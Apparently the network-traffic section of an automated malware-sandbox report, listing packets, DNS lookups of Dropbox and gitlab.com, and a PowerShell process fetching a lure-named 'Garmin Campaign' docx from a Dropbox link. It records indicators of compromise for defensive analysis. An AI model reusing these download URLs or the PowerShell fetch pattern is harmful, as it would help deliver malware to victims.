                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.061736107 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.061903000 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.061909914 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.061959028 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.070698023 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.070712090 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.070760012 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.070765972 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.070805073 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.195624113 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.195642948 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.195699930 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.195713997 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.195756912 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.204551935 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.204566002 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.204626083 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.204637051 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.204683065 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.214925051 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.214981079 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.215051889 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.215051889 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.215075970 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.215127945 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.223948956 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.223970890 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.224025965 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.224033117 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.224072933 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.234261990 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.234277964 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.234335899 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.234343052 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.234391928 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.243235111 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.243258953 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.243300915 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.243308067 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.243333101 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.243359089 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.252912998 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.252931118 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.252981901 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.252989054 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.253036022 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.263319016 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.263335943 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.263390064 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.263396978 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.263442039 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.387634039 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.387658119 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.387782097 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.387782097 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.387804985 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.387855053 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.396581888 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.396600008 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.396671057 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.396677971 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.396720886 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.405550003 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.405565023 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.405622959 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.405630112 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.405677080 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.415890932 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.415904999 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.416074991 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.416079998 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.416131973 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.423388958 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.423408031 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.423609972 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.423623085 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.423671961 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.433701038 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.433716059 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.433820009 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.433841944 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.433892012 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.442811012 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.442830086 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.442878008 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.442884922 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.442914009 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.442935944 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.450800896 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.450815916 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.450865984 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.450872898 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.450930119 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.581496000 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.581513882 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.581583023 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.581605911 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.581650019 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.592545033 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.592561007 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.592720032 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.592726946 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.592768908 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.603648901 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.603665113 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.603729010 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.603735924 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.607883930 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.616700888 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.616717100 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.616753101 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.616764069 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.616781950 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.616805077 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.625993967 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.626008034 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.626063108 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.626070023 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.626113892 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.638947010 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.638962984 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.639033079 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.639039993 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.639082909 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.649184942 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.649199963 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.649265051 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.649272919 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.649317980 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.660368919 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.660386086 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.660536051 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.660543919 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.660588980 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.768834114 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.769016981 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.769025087 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.778242111 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.778260946 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.778323889 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.778332949 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.787213087 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.787228107 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.787307978 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.787317991 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.787374973 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.796109915 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.796127081 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.796185970 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.796191931 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.805006027 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.805026054 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.805063963 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.805071115 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.805095911 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.813920021 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.813934088 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.813991070 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.813999891 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.822880983 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.822909117 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.822936058 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.822942972 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.822963953 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.832525015 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.832540035 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.832595110 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.832603931 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.878042936 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.961167097 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.961174965 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.961205006 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.961215019 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.961339951 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.961339951 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.961345911 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.961388111 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.972970009 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.972978115 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.973005056 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.973031044 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.973145008 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.973145008 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.973149061 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.973193884 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.984144926 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.984162092 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.984217882 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.984225035 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.984374046 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.995269060 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.995285034 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.995340109 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.995347023 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:24.995388031 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.006428003 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.006443977 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.006480932 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.006489038 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.006515980 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.006532907 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.017584085 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.017601967 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.017658949 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.017666101 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.017690897 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.017713070 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.029649973 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.029664993 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.029728889 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.029736042 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.029774904 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.038912058 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.038927078 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.038980007 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.038986921 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.039026022 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.152348995 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.152368069 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.152437925 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.152446985 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.152493000 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.162554979 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.162571907 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:25.162631035 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Dec 24, 2024 07:31:02.360244036 CET192.168.2.41.1.1.10x719eStandard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 24, 2024 07:31:04.855619907 CET192.168.2.41.1.1.10x8a07Standard query (0)uc2080206253754f3f57017a4a9f.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 24, 2024 07:31:08.831768036 CET192.168.2.41.1.1.10xb5ebStandard query (0)gitlab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Dec 24, 2024 07:31:02.497400999 CET1.1.1.1192.168.2.40x719eNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Dec 24, 2024 07:31:02.497400999 CET1.1.1.1192.168.2.40x719eNo error (0)www-env.dropbox-dns.com162.125.65.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 24, 2024 07:31:05.137284994 CET1.1.1.1192.168.2.40x8a07No error (0)uc2080206253754f3f57017a4a9f.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Dec 24, 2024 07:31:05.137284994 CET1.1.1.1192.168.2.40x8a07No error (0)edge-block-www-env.dropbox-dns.com162.125.65.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 24, 2024 07:31:08.969048023 CET1.1.1.1192.168.2.40xb5ebNo error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              0192.168.2.449730162.125.65.184437676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-12-24 06:31:03 UTC192OUTGET /scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1 HTTP/1.1
                                                                                                                                                                                                                              Host: www.dropbox.com
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2024-12-24 06:31:04 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                              Content-Security-Policy: img-src https://* data: blob: ; base-uri 'self' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-ancestors 'self' https://*.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* ca [TRUNCATED]
                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                              Location: https://uc2080206253754f3f57017a4a9f.dl.dropboxusercontent.com/cd/0/get/Cg3SINC28znh6C8PbwSNM5cVfu9xFzrrVq5RIJxfjYKNaINIs09eFgiS5XSBoEX4X4RT6xbPY6aVrxFWz1eK3iTFpxv2mbNHv_I-T6mdkL1K9a89uKA-rF7M5lCHpWZTnbcPdGl5jajIIRI9560P2xW0/file?dl=1#
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                              Set-Cookie: gvc=ODcxNjY1MzY1MzkzOTc0NTkzMDQ1MDgyMTQwMTk4NjE0NTM0NjE=; Path=/; Expires=Sun, 23 Dec 2029 06:31:04 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                              Set-Cookie: t=vNHCEP_MbWAip5180m4uh1wo; Path=/; Domain=dropbox.com; Expires=Wed, 24 Dec 2025 06:31:04 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                              Set-Cookie: __Host-js_csrf=vNHCEP_MbWAip5180m4uh1wo; Path=/; Expires=Wed, 24 Dec 2025 06:31:04 GMT; Secure; SameSite=None
                                                                                                                                                                                                                              Set-Cookie: __Host-ss=ni3YB2UQc0; Path=/; Expires=Wed, 24 Dec 2025 06:31:04 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                              Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 23 Dec 2029 06:31:04 GMT
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                              Content-Length: 17
                                                                                                                                                                                                                              Date: Tue, 24 Dec 2024 06:31:04 GMT
                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                              Server: envoy
